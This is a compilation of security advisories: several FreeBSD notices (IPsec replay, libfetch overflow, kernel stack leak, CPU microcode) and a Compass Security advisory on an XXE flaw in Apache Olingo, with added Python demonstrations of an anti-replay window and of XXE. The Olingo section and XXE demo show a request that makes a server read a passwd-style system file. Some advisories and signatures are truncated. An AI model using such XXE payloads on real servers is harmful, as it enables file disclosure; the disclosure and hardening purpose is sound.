FreeBSD Security Advisory FreeBSD-SA-20:02.ipsec
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-20:02.ipsec                                      Security Advisory
                                                          The FreeBSD Project

Topic:          Missing IPsec anti-replay window check

Category:       core
Module:         kernel
Announced:      2020-01-28
Credits:        Jean-Francois HREN
Affects:        FreeBSD 12.0 only
Corrected:      2020-01-28 18:56:46 UTC (releng/12.0, 12.0-RELEASE-p13)
CVE Name:       CVE-2019-5613

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit https://security.FreeBSD.org/.

I.   Background

IPsec is a suite of protocols providing data authentication, integrity, and
confidentiality between two networked hosts.

II.  Problem Description

The anti-replay window check is missing, so an attacker can re-inject a
previously captured packet and it will be accepted and processed by the
IPsec endpoint.

III. Impact

The impact depends on the higher-level protocols in use over IPsec. For
example, an attacker who can capture and inject packets could cause an
action that was intentionally performed once to be repeated.

IV.  Workaround

No workaround is available. Systems not using IPsec are not vulnerable.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date, and reboot.
After rebooting, freebsd-version -k should report 12.0-RELEASE-p13.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for a security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-20:02/ipsec.patch
# fetch https://security.FreeBSD.org/patches/SA-20:02/ipsec.patch.asc
# gpg --verify ipsec.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
releng/12.0/                                                      r357218
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5613

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-20:02.ipsec.asc
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl4whdFfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cIWbQ/9EvRm9/pFezk65B8NR9BJFYzSbFv8GxtxNjcFJ0KpG48s7XxBg9BWNKMs
b7dtGTRlPKGUh0CRfhkCzxx10JZ0Aeu+UNNWQrt7r34pku1bUTrOAqW9nxIBq8zr
tihvShWxWmMb9roeGRQIDpDoRCDs/Ps5eZ9NkTIRIPnGvidm8FTr8eQIHxSQJ/dX
9bnQO1KP3Fz1+ywKA/poMdfXwdrUhiaPaC9AQ704lMiz881Itsi93Xw9HceKar0E
dnbPbXMTQ+mkdVe3U2KLVDIMs119XL3Nuel2y7ACNjH3Bvjeerfjn6rZfiseV5FR
muH0I+HKVdkdgWrFRPPthzUTmZYaStgbgOymsclwCpUJkS/ITgJWTpx6V+0E+4n6
bocwue5xP9EtCKDoEp3RSf17f47nbHgA0oeR+1CU9bh2lU6h2lAxRhxkPcWrgBiJ
HWSJ96UyF3S9Kfj7sbKBE/0wPQYRO2fs2PSfjvjmydyYlg0gcZ25tK3sm5xyvxoG
pVCwMn3gFDchEWnxJaSrGg/xoQCCWM+KdVXkaBSdCEsqs8+o6bTXPrq8ZyU451aO
7qxLPBlw5XNZ87jUEOhT3PwH49H9sAl++4IHUUUvs5pcIigdTNplgVpRt2DdFDzg
ardLO/Cyr1qAAMClC3jXx0I7uTViROt3x7lg2+2V7bF5SnL8VjU=
=tFox
-----END PGP SIGNATURE-----
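The check the advisory reports as missing is the ESP/AH anti-replay sliding window (RFC 4303, section 3.4.3): a receiver keeps the highest sequence number it has accepted plus a bitmap of the most recent numbers below it, rejects anything already marked or older than the window before spending cycles on the ICV, and marks a number only after the ICV verified. The following Python model is added here as an illustration; it is not FreeBSD code. The 64-bit window size, the packet trace and the simulate() helper (whose enforce_window=False branch models the missing check) are assumptions made for the demonstration.

```python
"""Sliding anti-replay window as specified for IPsec ESP/AH (RFC 4303, 3.4.3).

Added illustration, not FreeBSD code. The window size (64), the packet trace
and the simulate() helper are assumptions made for the demonstration.
"""


class AntiReplayWindow:
    """Highest accepted sequence number plus a bitmap of the `size` most
    recent sequence numbers at or below it."""

    def __init__(self, size=64):
        self.size = size
        self.last_seq = 0   # highest sequence number accepted so far
        self.bitmap = 0     # bit i set <=> (last_seq - i) already accepted

    def check(self, seq):
        """Step 1: run before ICV verification. True if seq may be processed."""
        if seq == 0:
            return False                      # ESP never uses sequence 0
        if seq > self.last_seq:
            return True                       # right of the window: new
        diff = self.last_seq - seq
        if diff >= self.size:
            return False                      # left of the window: too old
        return not (self.bitmap >> diff) & 1  # inside window: new only if unset

    def update(self, seq):
        """Step 2: run only after the packet's ICV verified correctly."""
        if seq > self.last_seq:
            shift = seq - self.last_seq
            if shift >= self.size:
                self.bitmap = 1               # whole window slid past
            else:
                mask = (1 << self.size) - 1
                self.bitmap = ((self.bitmap << shift) | 1) & mask
            self.last_seq = seq
        else:
            self.bitmap |= 1 << (self.last_seq - seq)

    def accept(self, seq):
        """check() followed by update(); the ICV step is assumed to pass."""
        if not self.check(seq):
            return False
        self.update(seq)
        return True


def simulate(seqs, enforce_window):
    """Return the sequence numbers an endpoint would process.

    enforce_window=False models the missing check: every packet is
    processed, replays included.
    """
    window = AntiReplayWindow()
    processed = []
    for seq in seqs:
        if enforce_window:
            if window.accept(seq):
                processed.append(seq)
        else:
            processed.append(seq)
    return processed


if __name__ == "__main__":
    # Constructed trace: 2 is replayed, 4 arrives late, then 4 is replayed.
    trace = [1, 2, 3, 2, 5, 4, 4]
    print("with window:  ", simulate(trace, enforce_window=True))
    print("missing check:", simulate(trace, enforce_window=False))
```

Late packets inside the window (4 after 5) are still accepted, which is why the window exists at all; only duplicates and packets older than the window are dropped. Extended sequence numbers (ESN) and the 32-bit wrap, which a real SA must also handle, are outside this model.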
FreeBSD Security Advisory FreeBSD-SA-20:01.libfetch
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-20:01.libfetch                                   Security Advisory
                                                          The FreeBSD Project

Topic:          libfetch buffer overflow

Category:       core
Module:         libfetch
Announced:      2020-01-28
Credits:        Duncan Overbruck
Affects:        All supported versions of FreeBSD.
Corrected:      2020-01-28 18:40:55 UTC (stable/12, 12.1-STABLE)
                2020-01-28 18:55:25 UTC (releng/12.1, 12.1-RELEASE-p2)
                2020-01-28 18:55:25 UTC (releng/12.0, 12.0-RELEASE-p13)
                2020-01-28 18:42:06 UTC (stable/11, 11.3-STABLE)
                2020-01-28 18:55:25 UTC (releng/11.3, 11.3-RELEASE-p6)
CVE Name:       CVE-2020-7450

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit https://security.FreeBSD.org/.

I.   Background

libfetch(3) is a multi-protocol file transfer library included with FreeBSD
and used by the fetch(1) command-line tool, the pkg(8) package manager, and
others.

II.  Problem Description

A programming error allows an attacker who can specify a URL with a username
and/or password component to overflow libfetch(3) buffers.

III. Impact

An attacker in control of the URL to be fetched (possibly via HTTP redirect)
may cause a heap buffer overflow, resulting in program misbehavior or
malicious code execution.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date. After updating,
freebsd-version -u should report the corrected patch level for your branch
(for example 12.1-RELEASE-p2).

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-20:01/libfetch.patch
# fetch https://security.FreeBSD.org/patches/SA-20:01/libfetch.patch.asc
# gpg --verify libfetch.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in https://www.FreeBSD.org/handbook/makeworld.html.

Restart all daemons that use the library, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r357213
releng/12.1/                                                      r357217
releng/12.0/                                                      r357217
stable/11/                                                        r357214
releng/11.3/                                                      r357217
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7450

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-20:01.libfetch.asc
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl4whc5fFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cJw5BAAmi4Mk+an8qJB4GwfOSxWhn42GnN9/HikJwkiTNHQr7n51ANp4sHCgTYG
PCo6UvCFqdIfhpBIrykI7ZwzAetCpldDdIMQFJoi5ChJ7aIcNDpiH06yLjYLgseS
qSxJ+dXt6j7G2FMUWPBka8eTNBi64gT0MbyC7zFdISfJqfNy+p0WvdwYm3UsWkeR
pEV+o6zL+PI3s6IsqQTQzYuyNYgoTLdvhjgNMymI+OMH8uCdBUrdItdSwSYPwVOp
+8SUX47jMFNcIbBmuQ3KnPxu9fHx8JzfqpLDAkmp6hu6sXNTmIZ27mgItu4DRgWN
nvd750H6fv9UCbRYOyvjeuEN8olOpZcoTAuQDtcC/z7BvKAwLC7oAYXZEiQ4pn/D
MGMzlJU7fxiyIWDNJprzyrsgPAUhCC3ePyenTErB+GQKmf1fHTjLWJHN43W2tbqk
kYzMwwLQa3KwOYzHPHbJt6F94b9dN30v8cgIVkvs5ivLr8eErIJAQ71PgxkgRQL1
/C301qeJvgBqLm+so0Ef6wi/D9HvCvyk6IqbQNEvOXD8RNtyqdhBO1jJ93zDVLLK
ey5room7Hln/A3l5bXBzb6O3+q60U7lbxzokkAhNoe+pls6HQ50OeainXDU1dal4
HcBOCM1cnXNjXDdizqdMDvyR7ftXuBxOY
FreeBSD Security Advisory FreeBSD-SA-20:03.thrmisc
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-20:03.thrmisc                                    Security Advisory
                                                          The FreeBSD Project

Topic:          kernel stack data disclosure

Category:       core
Module:         kernel
Announced:      2020-01-28
Credits:        Ilja Van Sprundel
Affects:        All supported versions of FreeBSD.
Corrected:      2019-11-15 16:40:10 UTC (stable/12, 12.1-STABLE)
                2020-01-28 18:57:45 UTC (releng/12.1, 12.1-RELEASE-p2)
                2020-01-28 18:57:45 UTC (releng/12.0, 12.0-RELEASE-p13)
                2019-11-15 16:40:55 UTC (stable/11, 11.3-STABLE)
                2020-01-28 18:57:45 UTC (releng/11.3, 11.3-RELEASE-p6)
CVE Name:       CVE-2019-15875

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit https://security.FreeBSD.org/.

I.   Background

When a process crashes, the kernel can write a core dump file containing the
process state, for debugging.

II.  Problem Description

Due to incorrect initialization of a stack data structure, up to 20 bytes of
kernel data previously stored on the stack are written into the core dump and
thereby exposed to the owner of the crashing user process.

III. Impact

Sensitive kernel data may be disclosed.

IV.  Workaround

Core dumps may be disabled by setting the kern.coredump sysctl to 0:

# sysctl kern.coredump=0

To make the setting persistent across reboots, add kern.coredump=0 to
/etc/sysctl.conf. See sysctl(8) and sysctl.conf(5). Note that this disables
core dumps for all processes, which also removes them as a debugging aid.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date, and reboot.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for a security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-20:03/thrmisc.patch
# fetch https://security.FreeBSD.org/patches/SA-20:03/thrmisc.patch.asc
# gpg --verify thrmisc.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r354734
releng/12.1/                                                      r357219
releng/12.0/                                                      r357219
stable/11/                                                        r354735
releng/11.3/                                                      r357219
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15875

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-20:03.thrmisc.asc
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl4whdVfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cLOgg/7BAIhE6SQ06BkCKNBerK3jj1sY2gBc7aohLbzdhEpCIrrd+sMsh0tphII
ftR5psPaZahzjP9Mrs/lA1fWVsco1jo4icevGiPTfbEVqBF1S8XINccwQr3AvYJR
33PGUrgzY2rU8MTj0YPJ2EG3ahghb96lKkK3USikoJA5SsXSZkFphp2OFXnUFWbG
TXWOUBWXbHMBUprf/oXcvNo/ZjDcxvJzMqT2YIGwKOsT0Xtx5nD+6C390axRuVEd
sA6z1RhA/EEx6JMNSUAoG5rnJSXDYQTB2kd9ilozXi07CboVZ38loXy8492FGrin
uG3MfnI+PHrMtG+S5yHwzOGhB/20DNoWqLKZobTGr46r8rrdc553F5Cn7ivLEz9Y
Sk+IGjZfB99jv+JxCr/+/4gn3niOyh0MolqG9r0rT13fLmeQX5XtYfyYPJHE1wuR
+JZ9TQSaJ6TX/DcIsy60OWcfWAQOeoYsvTZO6hqpjHt66m2Ah1pdAyc8c0R8yaQG
tFpRhgQvYpiPJviq7NvM5V2afSo16RWWy9A+xEYUrxp0H0inVNOgdqwhln7ZzI4u
YoBis/eZkNAPxqFJyvJ89TQFmsWFPcpHjAGMoL+aCuIotuHHa/MPdT2pfyqHG9iL
E9axI8zhyzNUC+osR2I6DT/R8rF5QHAY8xI8FffiS8jfN3BJVm4=
=3mdJ
-----END PGP SIGNATURE-----
CVE-2019-17554 - Apache Olingo OData 4.0 - XML External Entity Resolution (XXE)
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  Apache Olingo OData 4.0
# Vendor:   Apache Foundation
# CSNC ID:  CSNC-2019-025
# CVE ID:   CVE-2019-17554
# Subject:  XML External Entity Resolution (XXE)
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Archibald Haddock (advisor...@compass-security.com)
# Date:     08.11.2019
#
#############################################################

Introduction:
-------------
Apache Olingo is a Java library that implements the Open Data Protocol
(OData) [1]. XML data is parsed by insecurely configured software
components, which can be abused for XML External Entity attacks [2].

Affected:
---------
Vulnerable:
 * Olingo OData 4.x.x to 4.6.x

Not vulnerable:
 * Olingo OData 4.7.0
 * The Olingo OData 2.0 implementation has had XXE protection since
   1.1.0-RC01

Technical Description
---------------------
The XML content type entity deserializer is not configured to deny the
resolution of external entities. Requests with content type
"application/xml", which trigger the deserialization of entities, can be
used to trigger XXE attacks.

The request below declares an external entity in the DOCTYPE internal
subset and references it from one of the entity's property values; the
server resolves the entity while deserializing the Atom entry and echoes the
resolved text back in the created entity.

Request
=======
POST /odata-server-sample/cars.svc/Cars HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8081/odata-server-sample/
Cookie: JSESSIONID=17C3158153CDC2CA1DBA0E77D4AFC3B0
Upgrade-Insecure-Requests: 1
content-type: application/xml
Content-Length: 1101

[XML entry body; the element tags were not preserved in this copy, only the
following attribute and text values]
]>
http://www.w3.org/2005/Atom; xmlns:m="http://docs.oasis-open.org/odata/ns/metadata; xmlns:d="http://docs.oasis-open.org/odata/ns/data; m:context="$metadata#Cars/$entity">
Cars(1)
2019-11-08T15:10:30Z
http://docs.oasis-open.org/odata/ns/related/Manufacturer; type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer">
http://docs.oasis-open.org/odata/ns/scheme; term="#olingo.odata.sample.Car">
1 F1 2012 189189.43 EUR

Response
========
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
OData-Version: 4.0
Content-Type: application/xml
Content-Length: 960
Date: Fri, 08 Nov 2019 14:22:35 GMT
Connection: close

[XML entry body; element tags not preserved, values as follows. The property
that referenced the external entity now carries a passwd(5)-style line read
from the server's filesystem]
http://www.w3.org/2005/Atom; xmlns:m="http://docs.oasis-open.org/odata/ns/metadata; xmlns:d="http://docs.oasis-open.org/odata/ns/data; m:context="$metadata#Cars">
Cars(1)
2019-11-08T15:22:35Z
http://docs.oasis-open.org/odata/ns/related/Manufacturer; type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer">
http://docs.oasis-open.org/odata/ns/scheme; term="#olingo.odata.sample.Car">
1 myuser:x:1000:1000:,,,:/home/myuser:/bin/bash 2012 189189.43 EUR

Workaround / Fix:
-----------------
Configure the XML reader securely [3].

In org.apache.olingo.server.core.deserializer.xml.ODataXmlDeserializer.java
on line 70 a javax.xml.stream.XMLInputFactory is instantiated:

  private static final XMLInputFactory FACTORY = XMLInputFactory.newFactory();

The XMLInputFactory should be configured not to resolve external entities
(the property string below is the value of the
XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES constant):

  FACTORY.setProperty(XMLInputFactory.SUPPORT_DTD, false);
  FACTORY.setProperty("javax.xml.stream.isSupportingExternalEntities", false);

Timeline:
---------
2019-11-08: Discovery by Compass Security
2019-11-08: Initial vendor notification
2019-11-08: Initial vendor response
2019-12-04: Release of fixed version / patch [4]
2019-12-05: Coordinated public disclosure date

References:
-----------
[1] https://olingo.apache.org/
[2] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
[3] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
[4] https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d7Ty%3DL-n_iAzT6vcQp65BY29XZDS5tMoM8MdDrb1moM7A%40mail.gmail.com%3E

Source: https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2019-025_apache_xxe.txt
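The property the fix toggles, external general entity resolution, exists in every XML parser, and the effect is easiest to see with a parser that runs stand-alone. The following Python example is added here and is not Olingo code: the advisory's fix is a Java StAX XMLInputFactory setting, this shows the same on/off switch on Python's expat-backed xml.sax parser, feeding it an entry whose text references a SYSTEM entity the way the advisory's request does. The <entry>/<model> element names, the entity name xxe, and the stand-in secret file are constructed for the demonstration (a file:// URL resolves the same way as the absolute path used here).

```python
"""XXE demonstration with Python's standard-library SAX parser.

Added illustration, not Olingo code. The page's fix is a Java StAX
XMLInputFactory setting; this shows the same property (external general
entity resolution on/off) on Python's expat-backed xml.sax parser.
The element names, the entity name and the secret file are constructed.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges, feature_external_pes


def write_secret_file(content):
    """Create a file standing in for /etc/passwd; return its absolute path."""
    fd, path = tempfile.mkstemp(prefix="xxe-demo-")
    with os.fdopen(fd, "wb") as f:
        f.write(content)
    return path


def remove_secret_file(path):
    os.unlink(path)


def build_payload(secret_path):
    """Entry whose property text references an external entity, like the
    advisory's request body (element names are assumed)."""
    return (
        b'<?xml version="1.0"?>\n'
        b'<!DOCTYPE entry [ <!ENTITY xxe SYSTEM "' + secret_path.encode() + b'"> ]>\n'
        b'<entry><model>F1 &xxe;</model></entry>\n'
    )


class _TextCollector(xml.sax.ContentHandler):
    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_model(xml_bytes, resolve_external_entities):
    """Return the character data of the parsed document.

    resolve_external_entities=True reproduces the Olingo bug: the parser
    opens the SYSTEM identifier and splices the file into the text.
    False is the hardened configuration (the entity expands to nothing).
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.setFeature(feature_external_pes, False)
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


if __name__ == "__main__":
    secret = write_secret_file(b"myuser:x:1000:1000:,,,:/home/myuser:/bin/bash")
    payload = build_payload(secret)
    print("vulnerable:", parse_model(payload, resolve_external_entities=True))
    print("hardened:  ", parse_model(payload, resolve_external_entities=False))
    remove_secret_file(secret)
```

The vulnerable call returns the property text with the file contents spliced in, which is exactly what the advisory's 201 response shows; the hardened call returns "F1 " because the entity reference expands to nothing. Disabling external entities is the minimum; also rejecting DTDs altogether (SUPPORT_DTD false in the Java fix) closes the internal-entity expansion attacks that the same DOCTYPE mechanism enables.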
FreeBSD Security Advisory FreeBSD-SA-19:25.mcepsc
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:25.mcepsc                                     Security Advisory
                                                          The FreeBSD Project

Topic:          Machine Check Exception on Page Size Change

Category:       core
Module:         kernel
Announced:      2019-11-12
Credits:        Intel
Affects:        All supported versions of FreeBSD.
Corrected:      2019-11-12 18:03:26 UTC (stable/12, 12.1-STABLE)
                2019-11-12 18:13:04 UTC (releng/12.1, 12.1-RELEASE-p1)
                2019-11-12 18:13:04 UTC (releng/12.0, 12.0-RELEASE-p12)
                2019-11-12 18:04:28 UTC (stable/11, 11.3-STABLE)
                2019-11-12 18:13:04 UTC (releng/11.3, 11.3-RELEASE-p5)
CVE Name:       CVE-2018-12207

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit https://security.FreeBSD.org/.

I.   Background

The Intel machine check architecture is a mechanism to detect and report
hardware errors, such as system bus errors, ECC errors, parity errors, and
others. It allows the processor to signal the detection of a machine check
error to the operating system.

II.  Problem Description

Intel discovered that a previously published erratum on some Intel platforms
can be exploited by malicious software to potentially cause a denial of
service by triggering a machine check that will crash or hang the system.

III. Impact

Malicious guest operating systems may be able to crash the host.

IV.  Workaround

No workaround is available. Systems not running untrusted guest virtual
machines are not impacted.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date, and reboot.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for a security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.1]
# fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.1.patch
# fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.1.patch.asc
# gpg --verify mcepsc.12.1.patch.asc

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.0.patch
# fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.0.patch.asc
# gpg --verify mcepsc.12.0.patch.asc

[FreeBSD 11.3]
# fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.11.patch.asc
# gpg --verify mcepsc.11.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r354650
releng/12.1/                                                      r354653
releng/12.0/                                                      r354653
stable/11/                                                        r354651
releng/11.3/                                                      r354653
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://software.intel.com/security-software-guidance/software-guidance/machine-check-error-avoidance-page-size-change
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12207

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:25.mcepsc.asc
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl3K+khfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ
FreeBSD Security Advisory FreeBSD-SA-19:26.mcu
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:26.mcu                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Intel CPU Microcode Update

Category:       3rd party
Module:         Intel CPU microcode
Announced:      2019-11-12
Credits:        Intel
Affects:        All supported versions of FreeBSD running on certain
                Intel CPUs.
CVE Name:       CVE-2019-11135, CVE-2019-11139, CVE-2018-12126,
                CVE-2018-12127, CVE-2018-12130, CVE-2018-11091,
                CVE-2017-5715

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit https://security.FreeBSD.org/.

I.   Background

From time to time Intel releases new CPU microcode to address functional
issues and security vulnerabilities. Such a release is also known as a
Micro Code Update (MCU), and is a component of a broader Intel Platform
Update (IPU).

FreeBSD distributes CPU microcode via the devcpu-data port and package.

II.  Problem Description

Starting with version 1.26, the devcpu-data port/package includes updates
and mitigations for the following technical and security advisories
(depending on CPU model).

Intel TSX Updates (TAA)             CVE-2019-11135
Voltage Modulation Vulnerability    CVE-2019-11139
MD_CLEAR Operations                 CVE-2018-12126  CVE-2018-12127
                                    CVE-2018-12130  CVE-2018-11091
TA Indirect Sharing                 CVE-2017-5715
EGETKEY                             CVE-2018-12126  CVE-2018-12127
                                    CVE-2018-12130  CVE-2018-11091
JCC SKX102 Erratum

Updated microcode includes mitigations for CPU issues, but may also cause a
performance regression due to the JCC erratum mitigation. Please visit
http://www.intel.com/benchmarks for further information.

Please visit http://www.intel.com/security for detailed information on
these advisories as well as a list of CPUs that are affected.

III. Impact

Operating a CPU without the latest microcode may result in erratic or
unpredictable behavior, including system crashes and lock ups.

Certain issues listed in this advisory may result in the leakage of
privileged system information to unprivileged users. Please refer to the
security advisories listed above for detailed information.

IV.  Workaround

To determine if TSX is present in your system, run the following:

1. kldload cpuctl
2. cpucontrol -i 7 /dev/cpuctl0

If bits 4 (0x10) and 11 (0x800) are set in the second response word (EBX),
TSX is present.

In the absence of updated microcode, TAA can be mitigated by enabling the
MDS mitigation:

3. sysctl hw.mds_disable=1

Systems must be running FreeBSD 11.3, FreeBSD 12.1, or later for this to
work.

*IMPORTANT*

If your use case can tolerate leaving the CPU issues unmitigated and cannot
tolerate a performance regression, ensure that the devcpu-data package is
not installed or is locked at 1.25 or earlier.

# pkg delete devcpu-data

or

# pkg lock devcpu-data

Later versions of the LLVM and GCC compilers will include changes that
partially relieve the performance impact.

V.   Solution

Install the latest Intel Microcode Update via the devcpu-data port/package,
version 1.26 or later.

Updated microcode adds the ability to disable TSX. With updated microcode
the issue can still be mitigated by enabling the MDS mitigation as described
in the workaround section, or by disabling TSX instead:

1. kldload cpuctl
